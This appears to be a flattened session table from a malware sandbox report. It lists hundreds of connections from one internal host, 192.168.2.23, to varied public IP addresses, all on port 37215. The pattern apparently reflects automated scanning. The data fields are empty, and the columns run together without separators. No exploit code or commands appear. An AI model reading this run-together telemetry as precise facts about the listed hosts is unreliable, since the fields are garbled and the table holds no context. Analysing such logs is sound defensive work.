                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16135192.168.2.2345968197.254.196.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16136192.168.2.2355060197.239.252.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16137192.168.2.2343476169.1.241.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16138192.168.2.2335492157.237.22.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16139192.168.2.235116241.210.124.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16140192.168.2.234710041.29.219.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16141192.168.2.2342198197.197.184.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16142192.168.2.235179841.234.241.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16143192.168.2.233451246.117.235.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16144192.168.2.2343694197.143.214.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16145192.168.2.235247485.132.122.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16146192.168.2.2348234157.168.184.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16147192.168.2.2360736197.198.61.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16148192.168.2.2351428175.185.20.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16149192.168.2.2351114197.200.89.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16150192.168.2.2345958157.197.215.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16151192.168.2.2337840197.105.0.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16152192.168.2.2338474157.44.17.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16153192.168.2.235816641.9.170.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16154192.168.2.2343576197.35.168.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16155192.168.2.2337784197.207.116.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16156192.168.2.236079841.156.77.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16157192.168.2.235886441.230.181.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16158192.168.2.2342872186.93.73.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16159192.168.2.234304041.140.244.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16160192.168.2.2349302157.21.83.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16161192.168.2.2344620197.219.233.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16162192.168.2.2357908197.169.215.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16163192.168.2.2342520183.246.184.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16164192.168.2.2353130157.171.44.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16165192.168.2.236021241.70.149.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16166192.168.2.2335374197.73.78.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16167192.168.2.2344738157.126.8.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16168192.168.2.233819641.202.165.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16169192.168.2.2348418157.45.109.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16170192.168.2.2358094197.48.245.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16171192.168.2.2346268197.56.170.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16172192.168.2.2347726157.124.73.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16173192.168.2.2341110197.84.125.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16174192.168.2.235871041.151.128.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16175192.168.2.234539041.95.51.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16176192.168.2.2334780157.71.154.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16177192.168.2.2360068184.73.20.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16178192.168.2.2341734181.39.217.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16179192.168.2.233321441.5.221.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16180192.168.2.2351650197.210.98.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16181192.168.2.2358324197.250.230.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16182192.168.2.2341994157.60.115.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16183192.168.2.235925841.145.1.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16184192.168.2.234998441.93.36.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16185192.168.2.2358346197.9.196.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16186192.168.2.234090041.100.125.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16187192.168.2.2360406197.115.253.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16188192.168.2.2344188157.167.125.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16189192.168.2.2339940197.163.107.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16190192.168.2.2343960157.101.148.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16191192.168.2.2337930157.93.243.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16192192.168.2.233479841.8.81.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16193192.168.2.233413241.154.233.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16194192.168.2.2355496157.150.215.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16195192.168.2.234511641.94.0.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16196192.168.2.235154641.180.45.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16197192.168.2.2346476197.56.92.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16198192.168.2.2343712197.55.184.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16199192.168.2.2358954194.37.128.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16200192.168.2.234125841.31.20.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16201192.168.2.2353964197.205.208.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16202192.168.2.2348450197.10.156.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16203192.168.2.2335836157.48.212.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16204192.168.2.2356652145.136.135.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16205192.168.2.2354504138.178.68.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16206192.168.2.233910641.51.87.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16207192.168.2.2338338197.121.44.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16208192.168.2.2359054140.130.192.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16209192.168.2.2360752197.81.172.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16210192.168.2.2360376197.231.43.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16211192.168.2.2347098197.4.141.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16212192.168.2.2352090135.18.141.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16213192.168.2.2354942157.174.132.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16214192.168.2.233422241.208.25.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16215192.168.2.2357556175.188.228.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16216192.168.2.234752249.192.229.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16217192.168.2.2340306157.141.144.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16218192.168.2.2340112186.87.17.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16219192.168.2.2341216157.122.188.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16220192.168.2.2338540197.143.122.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16221192.168.2.2339018156.160.156.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16222192.168.2.2339516157.235.98.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16223192.168.2.2334572143.77.123.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16224192.168.2.2351620197.18.81.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16225192.168.2.2348118157.71.153.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16226192.168.2.2352544157.136.169.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16227192.168.2.233843441.40.96.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16228192.168.2.2350196157.99.104.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16229192.168.2.235399641.142.89.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16230192.168.2.2342500157.24.64.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16231192.168.2.2333492157.30.218.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16232192.168.2.2346078197.116.100.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16233192.168.2.235158641.25.236.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16234192.168.2.2357874197.222.102.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16235192.168.2.233742841.53.63.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16236192.168.2.2353734157.118.20.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16237192.168.2.233360041.133.119.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16238192.168.2.233823253.4.220.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16239192.168.2.234027441.183.211.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16240192.168.2.2356062157.89.249.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16241192.168.2.234177041.7.23.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16242192.168.2.2337410197.158.81.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16243192.168.2.2343608129.45.40.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16244192.168.2.2342190157.133.98.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16245192.168.2.2340242197.168.110.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16246192.168.2.2357202157.157.111.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16247192.168.2.2349064157.66.42.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16248192.168.2.2350716197.34.205.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16249192.168.2.2358612157.34.15.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16250192.168.2.2345180157.228.252.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16251192.168.2.2334484157.121.215.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16252192.168.2.2335996157.154.26.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16253192.168.2.233639012.213.59.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16254192.168.2.235512685.212.192.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16255192.168.2.2356866197.11.35.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16256192.168.2.2344460197.199.6.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16257192.168.2.2332966157.30.229.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16258192.168.2.2356498157.206.237.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16259192.168.2.2359088197.48.122.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16260192.168.2.2338960197.135.98.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16261192.168.2.2350974197.97.246.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16262192.168.2.235583241.58.190.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16263192.168.2.2350422114.188.214.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16264192.168.2.234981841.130.19.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16265192.168.2.2338050197.206.156.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16266192.168.2.2349162190.203.103.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16267192.168.2.2335624197.230.147.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16268192.168.2.235222241.208.11.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16269192.168.2.2349506157.13.221.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16270192.168.2.2353752157.253.68.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16271192.168.2.2348022157.169.118.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16272192.168.2.2339258136.98.81.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16273192.168.2.2336988157.45.182.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16274192.168.2.2341466157.195.53.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16275192.168.2.2349890157.69.8.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16276192.168.2.233693254.153.17.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16277192.168.2.2360868157.253.153.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16278192.168.2.233448294.19.145.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16279192.168.2.2348460197.224.130.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16280192.168.2.2359362166.100.62.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16281192.168.2.2355256157.13.83.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16282192.168.2.234324843.47.216.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16283192.168.2.2355824157.7.8.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16284192.168.2.2351598157.34.191.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16285192.168.2.2341162157.247.176.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16286192.168.2.2359750197.112.199.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16287192.168.2.235098439.110.224.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16288192.168.2.234516841.214.190.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16289192.168.2.2332850197.253.87.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16290192.168.2.2333494157.192.239.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16291192.168.2.2349646157.33.199.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16292192.168.2.2356956157.74.240.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16293192.168.2.233971441.150.216.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16294192.168.2.2350386197.105.255.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16295192.168.2.2337126189.42.122.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16296192.168.2.2338746157.185.246.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16297192.168.2.2350892197.92.240.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16298192.168.2.2336538197.18.230.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16299192.168.2.2333562157.224.211.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16300192.168.2.233703041.94.58.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16301192.168.2.2360254197.90.100.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16302192.168.2.234819641.83.154.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16303192.168.2.2340652197.113.97.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16304192.168.2.2356008157.8.56.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16305192.168.2.2358326124.121.91.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16306192.168.2.2335298157.41.1.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16307192.168.2.2340774197.70.35.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16308192.168.2.2357566133.238.66.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16309192.168.2.234861641.178.121.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16310192.168.2.2360024157.3.50.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16311192.168.2.235904241.242.43.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16312192.168.2.2352922149.112.68.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16313192.168.2.2334464157.110.194.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16314192.168.2.233798641.66.89.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16315192.168.2.2338408197.145.137.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16316192.168.2.234339041.187.231.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16317192.168.2.235900441.89.188.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16318192.168.2.2349232197.60.76.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16319192.168.2.2338196197.13.157.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16320192.168.2.234037841.84.189.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16321192.168.2.2359786197.254.22.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16322192.168.2.2343032157.140.146.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16323192.168.2.235711241.246.35.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16324192.168.2.2336820157.253.79.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16325192.168.2.23600102.134.127.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16326192.168.2.2342174219.173.63.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16327192.168.2.2341510135.27.13.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16328192.168.2.233807241.2.59.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16329192.168.2.2342362178.124.121.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16330192.168.2.2334244197.178.182.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16331192.168.2.2341756197.68.152.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16332192.168.2.2338914197.92.2.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16333192.168.2.235465081.167.2.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16334192.168.2.2358810213.106.4.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16335192.168.2.2359242157.95.222.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16336192.168.2.233480641.64.142.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16337192.168.2.2342742197.229.149.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16338192.168.2.235258041.124.91.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16339192.168.2.235318891.245.226.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16340192.168.2.233774241.206.62.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16341192.168.2.2346870157.61.103.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16342192.168.2.234965441.117.224.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16343192.168.2.234623841.115.64.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16344192.168.2.2336648197.52.60.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16345192.168.2.233942441.249.179.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16346192.168.2.2353802197.178.86.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16347192.168.2.2356378197.189.124.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16348192.168.2.2338592197.23.186.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16349192.168.2.235881841.133.129.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16350192.168.2.235615441.26.59.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16351192.168.2.2357836157.169.245.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16352192.168.2.2346310157.195.52.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
